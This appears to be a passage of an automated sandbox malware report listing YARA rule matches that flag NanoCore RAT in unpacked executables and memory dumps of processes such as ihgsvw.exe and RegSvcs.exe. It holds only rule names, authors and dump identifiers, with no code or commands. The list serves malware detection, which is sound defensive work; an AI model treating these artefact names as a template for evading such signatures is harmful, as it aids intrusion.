Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 35.3.ihgsvw.exe.1810638.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 21.3.ihgsvw.exe.f2f340.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.1861890.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 10.2.RegSvcs.exe.6210000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.17f8880.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 22.2.RegSvcs.exe.2c4e71c.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.3.ihgsvw.exe.1861890.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.f38910.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 26.3.ihgsvw.exe.12c76a0.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Detects NanoCore Author: ditekSHen
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 33.3.ihgsvw.exe.fa1920.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.352579534.0000000001962000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.353786178.0000000004299000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.351627736.000000000192A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000003.407827944.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000003.408428728.0000000001293000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000021.00000003.467106466.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000A.00000002.785005873.0000000006210000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.431923501.0000000003C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.486991212.00000000017DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.431564388.00000000012A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000A.00000002.784950885.0000000006200000.00000004.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.309488610.000000000182E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.373949530.0000000000EFB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000021.00000003.467835981.0000000000F05000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000021.00000003.468424506.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.430480318.00000000012D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.487823598.00000000042C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.375313756.0000000003637000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.311176660.00000000017F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.430608111.000000000130B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.352185052.0000000001992000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.375626664.0000000000EC6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000003.408249022.0000000001300000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.309754638.0000000001861000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.374648689.0000000000F1B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.352676374.000000000197E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.482858075.0000000001810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001A.00000003.408583600.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.309384867.00000000017F9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.374247545.0000000000F2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.374514988.0000000000F00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.487203996.00000000017FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.432175450.00000000012D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000021.00000003.467996815.00000000039C0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.431239930.000000000132B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.487454794.0000000001773000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.430740099.000000000133E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Detects NanoCore Author: ditekSHen
Source: 0000000A.00000002.784420113.00000000052D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.373739340.0000000000EC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.376441556.0000000003BE9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000015.00000003.375042801.0000000000E92000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000003.310273116.000000000184C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000003.354054231.0000000001929000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000023.00000003.488033967.00000000017A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth (Nextron Systems)
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000001D.00000003.431128106.000000000130F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000016.00000002.375961002.0000000002BE1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
